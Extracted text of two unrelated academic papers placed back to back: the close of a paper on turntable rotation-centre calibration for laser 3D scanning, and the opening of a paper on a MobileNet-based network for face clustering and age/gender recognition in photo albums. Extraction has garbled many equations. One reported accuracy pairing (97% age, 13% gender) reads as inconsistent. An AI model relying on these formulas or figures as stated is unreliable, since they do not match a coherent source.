International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 50 As shown in Figure 2 above, Point ),( yxF is a point on the ellipse, and the focus of the ellipse is ),( 111 yxL and ),( 222 yxL . cOLOL 2 21    Since the sum of the distances from any point on the ellipse to the two focal points is a constant 2a, there is an error between the sum of the actual distances, and the error is θ. As shown in the following formula (2):   aFLFL 2 21   The above formula (2) is specifically expanded as follows:  ayyxxyyxx 2)()( 2 2 2 2 2 1 2 1 ）（）（   Using the above formula, the point cloud of the elliptical edge can be fitted by the least squares method, and the estimated values of the five parameters are obtained, and then linearized and solved iteratively. The criteria for the iterative solution process are: It is necessary to eliminate the edge point cloud data whose absolute value of the error θ is greater than or equal to 2.6β after each ellipse fitting. (β: standard error of unit weight after each iterative fitting) Between two adjacent iterative fittings, the absolute value of the distance of any elliptical focus position must be less than a certain pixel value (typically 0.001 pixels). If it is greater than or equal to this pixel, the iteration will end immediately. In the formula (3), the order:  2 1 '2 1 ' 1 )( yyxxl  ）（    2 2 '2 2 ' 2 )( yyxxl  ）（   Let 1FL ， 2FL be partial to 1x ， 2x ， 1y ， 2y . Then the above formula expands to:         0212 2 2 ' 2 2 2 ' 1 1 1 ' 1 1 1 ' 22 allay l yy x l xx y l yy x l xx   ' 1 x ， ' 1 y ， ' 2 x ， ' 2 y represents the initial value of the coordinate of the focus, and the focus satisfies the relationship as follows:  11 ' 1 xxx  ， 22 ' 2 xxx     11 ' 1 yyy  ， 22 ' 2 yyy     aaa  0   The initial position obtained is used as the initial value, and the point cloud data of the ellipse edge is fitted by the least squares method step by step iteration [11], then the parameter ( 1x ， 2x ， 1y ， 2y ， a ） can be solved, and the elliptical center ),( 00 yxO of the last fitting is:  2 21 0 xx x   ， 2 21 0 yy y     B. Symmetry method Since the image on the rotating platform has symmetry after being rotated by 180 degrees and is symmetrical about the center of rotation, a plurality of laser lines can be selected on the auxiliary pattern to perform calculation of the center of rotation to ensure accuracy. Finally, the parameters obtained can be optimized by methods such as BP neural network. In order to accurately calibrate the center of rotation, the straight line equations of the two straight lines 21ss and ' 2 ' 1 ss are fitted on the premise that the rotation angle of the rotating platform is known. Find the intersection O between the two lines. The intersection point O is the rotation center of the rotating platform. The point 1s is located at the position of the point ' 1 s after being rotated by 180 degrees, and point 2s is rotated 180 degrees and is located at point ' 2 s . 1s ， O， ' 1 s three points are collinear, and after rotation, are symmetric with respect to the rotation center O before rotation [12]. The principle of symmetry is shown in Figure 4.2 below. O ),x( 111 yS ),x( 222 yS ),x( 2 ' 2 ' 2 ' yS ),x( 1 ' 1 ' 1 ' yS Figure 3. Symmetrical view of the center of rotation International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 51 The calibration process of the symmetrical rotation platform is: (1) Firstly, the rotating platform is adjusted to the working position, the auxiliary pattern is pasted on the rotating platform or the circular calibration block is placed, and the line laser is passed through the center of the rotating platform; (2) Rotate the rotating platform at an angle (15 degrees) and start collecting data; (3) Extracting the center coordinates of the laser stripe in the data as pixel coordinates; (4) Calculating the world coordinates corresponding to the pixel coordinate system and storing the sample set; (5) After rotating 180 degrees, the sample set is derived for calculation of the rotation parameters. C. Plane fitting In the three-dimensional reconstruction of the rotating scanning mode, the obtained rotating point cloud is plane-fitted to fit the rotation center of the rotating platform [13]. The line laser emitter emits a laser beam that intersects the surface of the calibration block. As shown in the figure below, point A emits a line laser, and BC is the line of intersection between the laser and the calibration block. The plane formed between points A, B, and C is a light plane. The points in the light plane ( Δ ABC) conform to the plane equation (11). In online laser scanning, the acquired point clouds are all in the light plane, so all point clouds conform to the plane equation (11):  0a  dczbyx   The n point cloud data obtained by the rotation scan are sequentially brought into the upper equation of the light plane.           0 0 0 222 111 dczbyax dczbyax dczbyax nnn     Line laser transmitter Right camera Left camera Space laser plane P P P A B C Figure 4. Light plane equation There are 4 unknown n equations, and the values of four unknowns a, b, c, d can be solved by least squares method. The center of rotation of the rotating platform can be expressed as:  ) 1 , 1 , 1 ( 11 1      n i i n i n i ii z n y n x n O   In general, by gradually increasing the height of the rotating platform, a series of center points can be fitted in a straight line, so that the rotation axis can be calibrated. Then through the Rodrigo rotation formula [14], we can complete the coordinate transformation and so on. The comparison between the calibration methods of the center of rotation is shown in Table 1 below. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 52 TABLE I. COMPARISON BETWEEN ROTATION CENTER CALIBRATION METHODS calibration method Advantage Disadvantage Applicable situation Ellipse fitting method It can reduce the error in the measurement process with high precision. During the fitting process, the number of iterations is variable and it takes a lot of time. Due to interference of factors such as position and angle, the extracted edge contour is elliptical. Or the calibration block is elliptical. Symmetry method The principle is simple and easy to understand, and the accuracy is high. It is necessary to select multiple locations for testing, and to obtain an average value, which takes a lot of time. Suitable for circular rotating platforms. Or a circular calibration block. The point cloud obtained by scanning has higher precision. Plane fitting The operation is simple, no need to manually paste the mark points, and the speed is fast. The accuracy is low. Suitable for circular rotating platforms. Or a circular calibration block. V. CONCLUSION This paper introduces the basic process of linear laser rotation scanning. The measured object starts from a fixed angle and starts to rotate 360 degrees around the rotation axis or rotation center to obtain the three-dimensional contour of the rotating object. The basic knowledge of the rotating center of the rotating platform parameters during the rotating scanning process is introduced, and the calibration methods of the three rotating centers are summarized. The principles and steps of these three calibration methods are analyzed in detail. The advantages and disadvantages of the three methods and their application are summarized. It lays a theoretical foundation for the study of the calibration method of the rotating center. ACKNOWLEDGMENT This work is partially supported by Science & Technology Program of Weiyang District of Xi'an City with project “201836". REFERENCES [1] Choi S, Kim P, Boutilier R, et al. Development of a high speed laser scanning confocal microscope with an acquisition rate up to 200 frames per second[J]. Optics Express, 2013, 21(20):23611-23618. [2] Wei Z, Huadong G, Qi L, et al. Fine Deformation Monitoring of Ancient Building Based on Terrestrial Laser Scanning Technologies[C].IOP Conference Series: Earth and Environmental Science. IOP Publishing, 2014:682-691. [3] Zhong S D , Xiong J , Liu Y . 3-D reconstruction technology based on full circle multiple views[J]. Robot, 2004, 26(6):558-562. [4] Wei H . An Approach for Multiple-view Data Capture by a Single- view 3D Camera Using a Simple Revolve Device[J]. Journal of Applied Sciences, 2001. [5] Zhang A W, Ming-Zhe L I, Shao-Xing H U. 3D Surface Measurement Key Technique Based on Computer Vision[J]. Systems Engineering & Electronics, 2001. [6] Zhou L, Zheng S. A Registration Algorithm for Point Clouds Obtained by Scanning Objects on Turntable[J]. Acta Geodaetica Et Cartographica Sinica, 2013, 42(1):73-79. [7] Xi L , Yuexian Z , Renju L I , et al. 3-D surface integration in structured light 3-D scanning[J]. Journal of Tsinghua University, 2002, 42(4):477-480. [8] Zhang Z. A Flexible New Technique for Camera Calibration[J]. Microsoft Research, 2000, 22(11):1330-1334. [9] Tsai R Y. A versatile camera calibration technique for high-accuracy 3D machine vision metrology using off-the-shelf TV cameras and lenses[J]. IEEE Journal on Robotics & Automation, 2003, 3(4):323- 344. [10] Cheng H , Huaming Y, Zgang J . Structural light based computer vision [M]. National Defense Industry Press, 2015. [11] Mingjing C , Yuanmin F , Jie C . Fitting of circular curve based on least square method and iterative method[J]. Science of Surveying & Mapping, 2016. [12] Fuxing L. Accuracy Analysis of Determining Coordinates of Rotation Center of Indexing Table[J]. Mechanical industry standardization and quality, 2005(10):28-29. [13] Wq. 3D Reconstruction Based on the Structured light and Turntable[D].University of Electronic Science and Technology,2017. [14] Zelinsky A . Learning OpenCV---Computer Vision with the OpenCV Library (Bradski, G.R. et al.; 2008)[On the Shelf][J]. IEEE Robotics & Automation Magazine, 2009, 16(3):100-100. work_rnvsfzs6ffgp7d7tryvjj7kggi ---- Efficient facial representations for age, gender and identity recognition in organizing photo albums using multi-output ConvNet Efficient facial representations for age, gender and identity recognition in organizing photo albums using multi-output ConvNet Andrey V. Savchenko1,2 1 National Research University Higher School of Economics, Laboratory of Algorithms and Technologies for Network Analysis, Nizhny Novgorod, Russia 2 Samsung-PDMI Joint AI Center, St. Petersburg Department of Steklov Institute of Mathematics, St. Petersburg, Russia ABSTRACT This paper is focused on the automatic extraction of persons and their attributes (gender, year of born) from album of photos and videos. A two-stage approach is proposed in which, firstly, the convolutional neural network simultaneously predicts age/gender from all photos and additionally extracts facial representations suitable for face identification. Here the MobileNet is modified and is preliminarily trained to perform face recognition in order to additionally recognize age and gender. The age is estimated as the expected value of top predictions in the neural network. In the second stage of the proposed approach, extracted faces are grouped using hierarchical agglomerative clustering techniques. The birth year and gender of a person in each cluster are estimated using aggregation of predictions for individual photos. The proposed approach is implemented in an Android mobile application. It is experimentally demonstrated that the quality of facial clustering for the developed network is competitive with the state-of-the-art results achieved by deep neural networks, though implementation of the proposed approach is much computationally cheaper. Moreover, this approach is characterized by more accurate age/gender recognition when compared to the publicly available models. Subjects Artificial Intelligence, Computer Vision Keywords Facial representations, Face clustering, Age and gender recognition, Convolutional neural networks INTRODUCTION Nowadays, due to the extreme increase in multimedia resources, there is an urgent need to develop intelligent methods to process and organize them (Manju & Valarmathie, 2015). For example, the task of automatic structuring of photo and video albums is attracting increasing attention (Sokolova, Kharchevnikova & Savchenko, 2017; Zhang & Lu, 2002). The various photo organizing systems allow users to group and tag photos and videos in order to retrieve large number of images in the media library (He et al., 2017). The most typical processing of a gallery includes the faces grouping with automatic assignments of tags with the facial attributes (e.g., age and gender) to each subject in a group. The task of this paper is formulated as follows: given a large number of unlabeled How to cite this article Savchenko AV. 2019. Efficient facial representations for age, gender and identity recognition in organizing photo albums using multi-output ConvNet. PeerJ Comput. Sci. 5:e197 DOI 10.7717/peerj-cs.197 Submitted 6 February 2019 Accepted 3 May 2019 Published 10 June 2019 Corresponding author Andrey V. Savchenko, avsavchenko@hse.ru Academic editor Pinar Duygulu Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.197 Copyright 2019 Savchenko Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.197 mailto:avsavchenko@�hse.�ru https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.197 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ facial images, cluster the images into individual persons (identities) (He et al., 2017) and predict age and gender of each person (Rothe, Timofte & Van Gool, 2015). This problem is usually solved using deep convolutional neural networks (ConvNets) (Goodfellow, Bengio & Courville, 2016). At first, the clustering of photos and videos that contains the same person is performed using the known face verification (Crosswhite et al., 2017; Wang et al., 2018) and identification (Savchenko & Belova, 2018) methods. The age and gender of extracted faces can be recognized by other ConvNets (Eidinger, Enbar & Hassner, 2014; Rothe, Timofte & Van Gool, 2015). Though such an approach works rather well, it requires at least three different ConvNets, which increases the processing time, especially if the gallery should be organized on mobile platforms in offline mode. Moreover, every ConvNet learns its own face representation, and the quality can be limited by the small size of the training set or the noise in the training data. For example, the latter issue is especially crucial for age prediction, as the most widely used IMDB-Wiki dataset contains incorrect ground truth values of age due to mistakes in the year when the photo was taken. Such mistakes are introduced by an automatic crawling procedure used by Rothe, Timofte & Van Gool (2015). Therefore, the goal of this research is to improve the efficiency of facial clustering and age and gender prediction by learning face representation using preliminarily training on domain of unconstrained face identification from very large database. The contribution of this paper can be formulated as follows. Firstly, a multi-output extension of the MobileNet (Howard et al., 2017) is specially developed. It is pre-trained to perform face recognition using the VGGFace2 dataset (Cao et al., 2018). Additional layers of the proposed network are fine-tuned for age and gender recognition on Adience (Eidinger, Enbar & Hassner, 2014) and IMDB-Wiki (Rothe, Timofte & Van Gool, 2015) datasets. Secondly, it is proposed to estimate the age of the person by computing the expected value of top predictions in the age head of the proposed neural network. Finally, a novel approach to face grouping is proposed, which deals with several challenges of processing of real-world photo and video albums. RELATED WORKS Face clustering Contemporary deep learning techniques (Goodfellow, Bengio & Courville, 2016) can deal even with well-known crucial issues appeared in practical applications of face recognition, for example, unconstrained environment (various illumination and pose, partial occlusion) (Learned-Miller et al., 2016), or the small sample size problem (Savchenko, 2016), when usually only single facial image per person is available. The latter problem is solved using transfer learning or domain adaptation methods (Goodfellow, Bengio & Courville, 2016), in which large external datasets of celebrities are used to train deep ConvNet (Cao et al., 2018; Parkhi, Vedaldi & Zisserman, 2015). One of the main tasks of this paper is to group (cluster) the images into individual identities present in the given data with a large number of face images (He et al., 2017). In this task transfer learning techniques with fine-tuning of the ConvNet into the new training set of persons of interest is impossible because the images are unlabeled; that is, Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 2/26 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ the setting is completely unsupervised. Hence, traditional face clustering methods focus on finding effective face representation or appropriate dissimilarity measure between faces. The latter approach is examined by Zhu, Wen & Sun (2011), who proposed a rank-order distance that measures the similarity between two faces using their neighboring information. Shi, Otto & Jain (2018) designed a clustering algorithm, which directly estimates the adjacency matrix only based on the similarities between face images. This allows a dynamic selection of number of clusters and retains pairwise similarities between faces. However, the most accurate grouping in many practical tasks is still achieved by the usage of reliable face representations with consecutive agglomerative clustering (Zhang et al., 2016b). In this case, the ConvNet is pre-trained on external large dataset and is further applied to extract features of the training images from the limited sample of subjects using embeddings at one of the last layers (Sharif Razavian et al., 2014; Savchenko, 2019). Extraction of representative features (embeddings) is one the most important tasks in face recognition. Taigman et al. (2014) provided one of the first implementations of ConvNets for face verification using the DeepFace descriptor trained with simple negative log-likelihood (“softmax”) loss. Various regularizations of the loss functions have been studied in order to provide suitable representations. For example, center loss has been proposed by Wen et al. (2016) in order to simultaneously learn a center for deep features of each class and penalize the distances between the deep features and their corresponding class centers. Guo & Zhang (2017) proposed underrepresented- classes promotion loss term, which aligns the norms of the weight vectors of the underrepresented-classes to those of the normal classes. The Deep IDentification- verification features (DeepID2) are learned by alternating identification and verification phases with different loss functions (Sun et al., 2014). FaceNet descriptors (Schroff, Kalenichenko & Philbin, 2015) were trained using special triplet loss with triplets of roughly aligned matching/non-matching face patches. Recently, a family of angular and cosine margin-based losses have appeared. For example, the angular softmax loss was used to learn SphereFace descriptors (Liu et al., 2017b). The ArcFace loss (Deng et al., 2019) directly maximizes decision boundary in angular (arc) space based on the L2- normalized weights and features. However, it is worth noting that the usage of softmax loss still gives the most accurate representations if the dataset is very large. Cao et al. (2018) gathered VGGFace-2 dataset with 3M photos of 10K subjects and trained conventional ResNet-based networks, which achieve state-of-the-art results in various face recognition tasks. Recently, the research directions have been shifted into learning a compact embedding using ConvNets with low latency. For example, Wu et al. (2018) introduced the concept of maxout activation and proposed a light ConvNet suitable for fast but still accurate face recognition. Facial attributes recognition Recognition of facial attributes appeared in many practical applications. For instance, one of the goals of video analysis in retail is to fill the advertisements with relevant information, interesting to a target group. In this paper, it was decided to focus on age and gender Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 3/26 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ (Kharchevnikova & Savchenko, 2016), which are the most important attributes in the automatic organization of a gallery of photos. A decade ago traditional computer vision techniques, for example, classification of Gabor features have been thoroughly studied (Choi et al., 2011). Nowadays, the most prominent results are achieved by deep ConvNets. For example, Eidinger, Enbar & Hassner (2014) gather the Adience dataset and trained the Gender_net and Age_net models, which achieved very accurate classification. Also, Rothe, Timofte & Van Gool (2015) provided large IMDB-Wiki dataset and trained deep VGG-16 ConvNets, which achieved the state-of-the-art results in gender and age recognition. Antipov et al. (2017) extended the paper (Rothe, Timofte & Van Gool, 2015) of and demonstrated that the transfer learning with the face recognition pre-training (Rassadin, Gruzdev & Savchenko, 2017) is more effective for gender and age recognition compared to general pre-training using ImageNet dataset. Unfortunately, the above-mentioned ConvNet-based methods are characterized by considerable memory consumption and computational complexity. More importantly, the size of the datasets with labeled age and gender attributes is rather low when compared to the datasets used for face recognition mentioned in the previous subsection. It is rather obvious that the closeness among the facial processing tasks can be exploited in order to learn efficient face representations which boosts up their individual performances. Hence, one of the main parts of this paper is to use the embeddings trained for face identification in order to predict age and gender of a given person. There exist several studies, which use such multi-task approach. For instance, Han et al. (2018) trained a single ConvNet to classify several facial attributes. Simultaneous face detection, landmark localization, pose estimation, and gender recognition is implemented in the paper (Ranjan, Patel & Chellappa, 2017) by a single ConvNet. However, this model is primarily focused only on rather simple task of localization of a facial region (face detection). It does not extract useful facial representations (features) and cannot be used in face identification and/or clustering. Another important example of simultaneous facial analysis is presented in the patent application (Yoo et al., 2018). The task solved by this invention is rather close to the task considered in this paper, namely, prediction of identifier (ID) and human attributes (age, gender, etc.) given a facial image using multi-task training. However, this device does not predict the birth year as it only classifies the age range, that is, “baby” (0–7 years), “child” (8–12), “senior” (61- : : : ), etc. Secondly, all the recognition tasks (ID and facial attributes) are trained simultaneously in this invention, which requires the training set to include facial images with known ID and all attributes. In practice, the existing face datasets do not include all this information. Hence, this method restricts the used training set, and, as a consequence, cannot provide the highest accuracies in all tasks. Finally, this model predicts the ID from a limited set of IDs from the training set. Hence, it cannot be used for face identification with small training samples because it does not implement the domain adaptation and is restricted to the IDs from the given training set. More importantly it is impossible to apply this method for organizing the photo albums in completely unsupervised environment with unknown persons. Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 4/26 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ It seems that there is still a lack of studies devoted to simultaneous extraction of reliable representations and face attribute classification suitable for face grouping and age/gender prediction for each person using a set of his or her photos. MULTI-OUTPUT CONVNET FOR SIMULTANEOUS AGE, GENDER, AND IDENTITY RECOGNITION In this paper, several different facial analytic tasks are considered. It is assumed that the facial regions are obtained in each image using any appropriate face detector; for example, either traditional multi-view cascade Viola–Jones classifier or more accurate ConvNet- based methods (Zhang et al., 2016a). The gender recognition task is a binary classification problem, in which the obtained facial image is assigned to one of two classes (male and female). The age prediction is the special case of regression problem, though sometimes it is considered as a multi-class classification with, for example, N = 100 different classes, so that it is required to predict if an observed person is 1, 2, : : : or 100 years old (Rothe, Timofte & Van Gool, 2015). In such a case, these two tasks become very similar and can be solved by traditional deep learning techniques. Namely, the large facial dataset of persons with known age and/or gender is gathered; for example, the IMDB-Wiki (Rothe, Timofte & Van Gool, 2015). After that the deep ConvNet is learned to solve the classification task. The resulted networks can be applied to predict age and gender given a new facial image. The last task examined in this paper, namely, unconstrained face identification significantly differs from age and gender recognition. The unsupervised learning case is considered, in which facial images from a gallery set should be assigned to one of C � 1 subjects (identities). Domain adaptation (Goodfellow, Bengio & Courville, 2016) is usually applied here: each image is described with the off-the-shelf feature vector using the deep ConvNet (Sharif Razavian et al., 2014), which has been preliminarily trained for the supervised face identification on large external dataset, for example, CASIA-WebFace, VGGFace/VGGFace2, or MS-Celeb-1M. The L2-normalized outputs at the one of last layers of this ConvNet for each rth gallery image are used as the D-dimensional feature vectors xr = [xr;1, : : : , xr;D]. Finally, any appropriate clustering method, that is, hierarchical agglomerative clustering (Aggarwal & Reddy, 2013), can be used to make a final decision for these feature vectors. In most research studies all these tasks are solved by independent ConvNets even though it is necessary to solve all of them. As a result, the processing of each facial image becomes time-consuming, especially for offline mobile applications (Kharchevnikova & Savchenko, 2018). In this paper it is proposed to solve all these tasks by the same ConvNet. In particular, it is assumed that the features extracted during face identification can be rather rich for any facial analysis. For example, it was shown the VGGFace features (Parkhi, Vedaldi & Zisserman, 2015) can be used to increase the accuracy of visual emotion recognition (Kaya, Gürpnar & Salah, 2017; Rassadin, Gruzdev & Savchenko, 2017). As the main requirement in this study is the possibility to use the ConvNet on mobile platforms, it was decided to use straightforward modification of the MobileNet v1 (Howard et al., 2017) (Fig. 1). This model contains 27 sequentially connected Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 5/26 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ convolutional and depthwise convolutional layers, which proved to be memory efficient and provide excellent inference speed even on mobile devices. It is seven- and 35-times smaller than conventional ResNet-50 and VGG16 models, respectively. What is more important, such small size of the model does not cause significant decrease of the recognition accuracy in various image recognition tasks. For example, top-1 accuracy on ImageNet-1000 of the MobileNet v1 (70.4%) is only 0.9% and 4.5% lower when compared to the accuracy of VGG16 and ResNet-50, respectively. The bottom (backbone) part of the proposed network, namely, conventional MobileNet v1 pre-trained on ImageNet-1000, extracts the representations suitable for face identification. The top part contains one new hidden layer with dropout regularization after extraction of identity features and two independent fully connected layers with softmax and sigmoid outputs for age and gender recognition, respectively. The learning of this model is performed incrementally, At first, the base MobileNet is trained for face identification on a very large facial dataset using conventional cross-entropy (softmax) loss. Next, the last classification layer is removed, and the weights of the MobileNet base are frozen. Finally, the remaining layers in the head are learned for age and gender recognition tasks by minimizing the sum of cross-entropies for both outputs. It is necessary to emphasize that not all images in most datasets of facial attributes contain information about both age and gender. Moreover, some attribute may be completely unknown, if several datasets are united. As a result, the number of faces with both age and gender information is several times smaller when compared to the whole number of facial images. Finally, the gender data for different ages is also very imbalanced. Figure 1 Proposed ConvNet. Full-size DOI: 10.7717/peerj-cs.197/fig-1 Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 6/26 http://dx.doi.org/10.7717/peerj-cs.197/fig-1 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ Thus, it was decided to train both heads of the ConvNet (Fig. 1) independently using different training data for age and gender classification. In particular, I alternate the mini-batches with age and gender info, and train only the part of the proposed network, that is, the weights of the fully connected layer in the age head of the proposed model are not updated for the mini-batch with the gender info. This ConvNet has the following advantages. First of all, it is obviously very efficient due to either usage of the MobileNet backbone or the possibility to simultaneously solve all three tasks (age, gender, and identity recognition) without need to implement an inference in three different networks. Secondly, in contrast to the publicly available datasets for age and gender prediction, which are rather small (compared to the datasets for face recognition) and dirty, the proposed model exploit the potential of very large and clean face identification datasets to learn very good face representation. Moreover, the hidden layer between the identity features and two outputs further combines the knowledge necessary to predict age and gender. As a result, the proposed model makes it possible to increase the accuracy of age/gender recognition when compared to the models trained only on specific datasets; for example, IMDB-Wiki or Adience. PROPOSED PIPELINE FOR ORGANIZING PHOTO AND VIDEO ALBUMS The complete data flow of the usage of the ConvNet (Fig. 1) for organizing albums with photos and videos the is presented in Fig. 2. Here faces in each photo are detected using the MTCNN (multi-task convolutional neural network) (Zhang et al., 2016a). Next, an inference in the proposed ConvNet is performed for all detected faces Xr in order to extract D-dimensional identity feature vector xr and predict age and gender. Current age ar of the rth person is estimated by adding a difference between current date and the photo creation date to the predicted age. After that, all faces are clustered using the following Figure 2 Proposed pipeline. Full-size DOI: 10.7717/peerj-cs.197/fig-2 Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 7/26 http://dx.doi.org/10.7717/peerj-cs.197/fig-2 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ dissimilarity measure between identity features and birth year predictions of two facial images Xr and Xj: qðXr; XjÞ ¼k xr � xj k22 þw ðar � ajÞ2 ar þ aj ; (1) where ||x||2 is L2 norm and w � 0 is a fixed weight (e.g., 0.1) of linear scalarization. The second term of (1) was chosen for age distance in order to maximize the difference between small babies, who usually have similar identity features. As the number of subjects in the photo albums is usually unknown, a hierarchical agglomerative clustering is used (Aggarwal & Reddy, 2013). Only rather large clusters with a minimal number of faces are retained during the cluster refinement. The gender and the birth year of a person in each cluster are estimated by appropriate fusion techniques (Kharchevnikova & Savchenko, 2016, 2018); for example, simple voting or maximizing the average posterior probabilities at the output of the ConvNet (Fig. 1). For example, the product rule (Kittler et al., 1998) can be applied if the independence of all facial images Xr, r ∈ {r1, : : : ,rM} in a cluster is naively assumed: max n2f1;:::;Ng YM m¼1 pnðXrmÞ ¼ max n2f1;:::;Ng XM m¼1 log pnðXrmÞ; (2) where N is the total number of classes and pn (Xrm) is the nth output of the ConvNet for the input image Xrm. The same procedure is repeated for all video files. Only each of, for example, three or five frames, is selected in each video clip, extract identity features of all detected faces and initially cluster only the faces found in this clip. After that the normalized average of identity features of all clusters (Sokolova, Kharchevnikova & Savchenko, 2017) are computed. They are added to the dataset {Xr} so that the “Facial clustering” module handles both features of all photos and average feature vectors of subjects found in all videos. Let me summarize the main novel parts of this pipeline. Firstly, the simple age prediction by maximizing the output of the corresponding head of the proposed ConvNet is not accurate due to the imbalance of described training set, which leads to the decision in favor of one of the majority class. Hence, it was decided to aggregate the outputs {pa(Xr)} of the age head. However, I experimentally found that the combination of all outputs is again inaccurate, because the majority of subjects in the training set are 20–40 years old. Thus, it is proposed to choose only L ∈ {1, 2, : : : , Na} indices {a1, : : : , aL} of the maximal outputs, where Na is the number of different age classes. Next, the expected mean �a Xrð Þ for each gallery facial image Xr is computed using normalized top outputs as follows: �a Xrð Þ ¼ PL l¼1 al � pal Xrð Þ PL l¼1 pal Xrð Þ (3) Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 8/26 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ Secondly, the birth year of each face is estimated by subtracting the predicted age from the image file creation date. In such a case, it will be possible to organize the very large albums gathered over the years. The predicted birth year is used as an additional feature during the cluster analysis in order to partially overcome the known similarity of young babies in a family. The distance between two faces are computed as a sum of a distance between facial features and appropriately scaled distance (1) between predicted current ages with respect to the photo creation dates. Finally, several tricks in the cluster refinement module were implemented (Fig. 2). At first, the different faces appeared on the same photo are specially marked. As such faces must be stored in different groups, complete linkage clustering of every facial cluster is additionally performed. The distance matrix is designed so that the distances between the faces at the same photo are set to the maximum value, which is much larger than the threshold applied when forming flat clusters. Moreover, it is assumed that the most valuable clusters of an owner of mobile device, his or her friends and relatives should not contain photos/videos taken in only one day. Hence, a certain threshold (1 day by default) for a number of days between the earliest and the eldest photo in a cluster is set in order to disambiguate large quantity of unimportant causal faces. The proposed approach (Fig. 2) was implemented as a part of a special mobile application for Android (Fig. 3). The application may operate in offline mode and does not require an Internet connection. It sequentially processes all photos from the gallery in a background thread. The demography pane provides stacked histograms (Fig. 3A) of facial attributes of the largest extracted clusters (family members and friends). Tapping on Figure 3 Results of organization of the gallery in the mobile demo. Photo credit: Andrey V. Savchenko. Full-size DOI: 10.7717/peerj-cs.197/fig-3 Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 9/26 http://dx.doi.org/10.7717/peerj-cs.197/fig-3 http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ each bar within the horizontal stacked histogram in Fig. 3A causes the list of all photos of a particular individual to be displayed (Fig. 3B). It is important to emphasize at this point that entire photos rather than just faces extracted therefrom are presented in the display form of the application, so that photos with several persons can be exposed. If there are plural individuals with an identical gender and age range, then a spinner (combo box) can be provided on top of the display form, and that spinner is usable to select a particular person by an associated sequential number (Fig. 3C). EXPERIMENTAL RESULTS Details of the training procedure In order to test the described approach (Fig. 2), I implemented it in a special software (https://github.com/HSE-asavchenko/HSE_FaceRec_tf/tree/master/age_gender_identity) using Python language with the Tensorflow and Keras frameworks and the Scikit-learn/ SciPy/NumPy libraries. My fine-tuned CNNs are publicly available. The network (Fig. 1) has been trained as follows. At first, the weights of the backbone MobileNet are learned for face identification problem using 3,067,564 facial images of 9,132 subjects from VGGFace2 dataset (Cao et al., 2018). This base CNN was trained for 20 epochs with early stopping on validation set of 243,722 other images using Adam optimizer of softmax loss with learning rate 0.001 and decay 1E-5. Next, I populated the training dataset by 300K frontal cropped facial images from the IMDB-Wiki dataset (Rothe, Timofte & Van Gool, 2015). Unfortunately, the age groups in this dataset are very imbalanced, so the trained models work incorrectly for faces of very young or old people. Hence, it was decided to add all (15K) images from the Adience (Eidinger, Enbar & Hassner, 2014) dataset. As the latter contains only age intervals, for example, “(0–2),” “(60–100),” I put all images from this interval to the middle age, for example, “1” or “80.” The resulted training set contains partially overlapped 22,084 images with gender label and 216,465 images with age label. The validation set includes other 26,230 labeled images with both age and gender available. In this study both age and gender recognition tasks are treated as classification problems with Ng = 2 (male/female) and (1,2,...100 years old) classes, respectively. The proposed network is fine-tuned on the gathered dataset in order to minimize the following joint loss function L ¼ � X g2G log png ðXiÞ � X a2A log pnaðXiÞ; (4) which is computed as a sum of gender binary cross-entropy loss and age categorical cross-entropy loss. Here pn(X) is the nth output of the ConvNet for the input image X, that is, the estimate of posterior probability of the nth class, G is a set of indices g of images in the training set with known gender label ng. Similarly, set A contains indices a of training images with given age na. In order to compute the above-mentioned cross entropy loss functions, one-hot encoding is used for both age and gender labels. The top part of the network (Fig. 1) with frozen weights of the base CNN has been learned for three epochs using Adam optimizer of the loss (4) with alternate age/gender Savchenko (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.197 10/26 https://github.com/HSE-asavchenko/HSE_FaceRec_tf/tree/master/age_gender_identity http://dx.doi.org/10.7717/peerj-cs.197 https://peerj.com/computer-science/ batches. As a result, 97% and 13% validation accuracies were obtained for age and gender, respectively. If the whole network including the backbone MobileNet is fine-tuned for one epoch using the SGD optimizer with learning rate 1E-4, these accuracies are increased to 98% and 16%, but the quality of identity features suitable for face recognition obviously decreases. Facial clustering In this subsection experimental study of the proposed system (Fig. 2) are provided in facial clustering task for images gathered in unconstrained environments. The identity features extracted by the base MobileNet (Fig. 1) are compared to the publicly available ConvNets suitable for face recognition, namely, the VGGFace (VGGNet-16) (Parkhi, Vedaldi & Zisserman, 2015) and the VGGFace2 (ResNet-50) (Cao et al., 2018). The VGGFace, VGGFace2, and MobileNet extract D = 4,096, D = 2,048, and D = 1,024 non-negative features in the output of “fc7,” “pool5_7x7_s1,” and “reshape_1/Mean” layers from 224�224 RGB images, respectively. All hierarchical clustering methods from SciPy library are used with the Euclidean (L2) distance between feature vectors. As the centroid and the Ward’s linkage showed very poor performance in all cases, only results for single, average, complete, weighted, and median linkage methods are reported. In addition, the rank-order clustering (Zhu, Wen & Sun, 2011) was implemented, which was specially developed for organizing faces in photo albums. The parameters of all clustering methods were tuned using 10% of each dataset. The following clustering 